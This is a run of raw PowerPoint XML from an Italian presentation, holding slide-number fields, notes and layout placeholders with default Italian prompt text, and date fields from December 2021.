                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D5226B1-B451-4E1A-B06D-72F59318B8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7567F206-9331-4288-94D6-1B90EEC30567}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>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egnaposto immagine diapositiva 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B824811-5F45-4236-90F0-C7C10431E2CB}"/>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Segnaposto note 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96D20E46-4747-4ED2-ADAC-CB49240A772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18788" name="Segnaposto numero diapositiva 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF59E416-197A-476A-8239-A354090655F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257A66B6-FB5F-4436-89E8-57F22D7744CB}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>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egnaposto immagine diapositiva 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2565EFF7-2F5A-4C06-9C2D-BE52000DB4B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdi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Segnaposto note 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0AA5985-B35B-439D-A313-3F892CB64A2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
        <p:nvSpPr>
          <p:cNvPr id="120836" name="Segnaposto numero diapositiva 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DA25925-5131-4CCF-99C4-9BC90F63DEE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DE068237-E994-4F20-A1A8-8EF80AC1B744}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>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FB9DA586-C8A2-46D2-B8AD-0E007B39ED4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5D5277E-8821-414B-AA52-55D2C52DDF71}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AF30FE3-88BC-4DF5-A01C-D504E28F9050}"/>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2" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{449A08A8-FF26-4AA3-AA65-EE50731475CA}"/>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FD912ED-0F95-4F51-B348-E7C22E94DE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75364AA-BAC0-4E6A-A731-DEABA27B2C87}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BE6B275-5FFD-4BC5-ADAD-2F99E8BC6AA2}"/>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0" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D17C4E5-F765-4256-9394-1526720C882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A02156A9-DF6B-4775-800D-B3078DFCD20D}"/>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2C66008-9BB4-482E-B301-F4C42DEDEBC3}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0726409C-BA94-48DB-8841-2B175CC35CF0}"/>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8" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D42C91AC-9183-4E38-B0B6-47CBFFF39211}"/>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8198914B-3D5D-44E9-9DB2-67B5B6B31C8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FC4B0268-B518-4240-A8C5-B0A5C9206FDC}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA026637-7308-479B-9FC4-17961858913A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noRo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6" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F82524B7-C3B0-4F78-8939-BC9D5B0E42E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it-IT"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4" name="Connettore 1 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{406289E4-A963-416B-A1B3-82B6FDED4369}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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29" name="Titolo 28"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="4853412"/>
            <a:ext cx="11277600" cy="1222375"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del titolo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Sottotitolo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it-IT"/>
              <a:t>Fare clic per modificare lo stile del sottotitolo dello schema</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto data 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36B8D82A-1060-4AE4-B35A-12BF7DE56A42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{2AFFAC46-5C6B-435C-9740-1445A1FF863D}" type="datetimeFigureOut">
              <a:rPr lang="it-IT"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>20/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto piè di pagina 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1778F05F-DF0F-4AD5-8EA5-9089DDE357A9}"/>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14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6AE3E44-D3AF-447C-B55D-1E07669B8054}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10972801" y="6473825"/>
            <a:ext cx="1011767" cy="247650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{257E285C-639C-4480-9A3A-5AEA70E24E95}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1416544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10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4EB666E-2A79-4346-9BE9-433C403FAD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A4C98094-44D8-4871-BC08-3C86EE460E26}" type="datetimeFigureOut">
              <a:rPr lang="it-IT"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>20/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4F5F123-098D-4E88-A4B9-2B211EB52325}"/>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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78C74FA1-96D2-4B34-8727-9E7FF6157F4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{2983E0F3-06E6-4A0F-843A-A886DCAB63AD}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="313865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9144000" y="549277"/>
            <a:ext cx="2438400" cy="5851525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del titolo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto testo verticale 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" orient="vert" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="549277"/>
            <a:ext cx="8331200" cy="585152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490CA99-7C67-4CDD-A144-635F2C04888E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{362043F4-DC8D-4321-A468-94E7EC806070}" type="datetimeFigureOut">
              <a:rPr lang="it-IT"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>20/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8B717A3-A0F6-4824-BA75-C3B159F4E0CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto numero diapositiva 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A89B453-FD3B-4A8F-B459-C9056BFA52F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{AD67BCE9-9474-4AA3-B32D-E142A5A60B5C}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3857710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2" name="Titolo 21"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del titolo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Segnaposto contenuto 26"/>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24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5334EF48-E6D7-4B38-A016-E06595625E90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{231204ED-8AD8-4A1A-BEBC-2525EC6CD2F4}" type="datetimeFigureOut">
              <a:rPr lang="it-IT"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>20/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05BEF7AC-E75E-4246-B06E-E651765283BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4775200" y="76201"/>
            <a:ext cx="3860800" cy="288925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto numero diapositiva 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E484F0C-4B15-4C83-BDFC-461C8AE916D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10972801" y="6473825"/>
            <a:ext cx="1011767" cy="247650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{5ECE58FD-95F1-453B-8F0D-6B422DEE923C}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="348165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onnettore 1 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3850DCED-29CF-48D5-A277-47FBB895ABCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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6" name="Segnaposto testo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it-IT"/>
              <a:t>Fare clic per modificare stili del testo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Titolo 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240633" y="2947086"/>
            <a:ext cx="11582400" cy="1184825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del titolo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto data 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E80542D2-945A-4457-AFC9-E75DAC1D804F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{82112BCF-1520-43DA-8129-44F2686FFD7D}" type="datetimeFigureOut">
              <a:rPr lang="it-IT"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>20/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Segnaposto piè di pagina 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20DC771E-81EC-4E2A-9C18-3970C8D22CB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Segnaposto numero diapositiva 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F3B1823-AB05-4E66-B24C-27052969EA0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{B4AF005D-856F-4240-B285-219DD67C0D97}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="201366567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0" name="Titolo 1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14" name="Segnaposto contenuto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13" name="Segnaposto contenuto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10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFFE8C6B-4B2E-4E26-B55F-25DDDDFA47F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{24F658A3-F108-4CFB-84DC-65DE13EEB161}" type="datetimeFigureOut">
              <a:rPr lang="it-IT"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>20/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto piè di pagina 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92505F36-C3D1-46FD-90BE-D41508EC65EE}"/>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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B09CFC51-2CDC-4D61-86F9-792E52B3BCC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{B17B9E9B-7826-468F-BC2C-0084F2DE8905}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
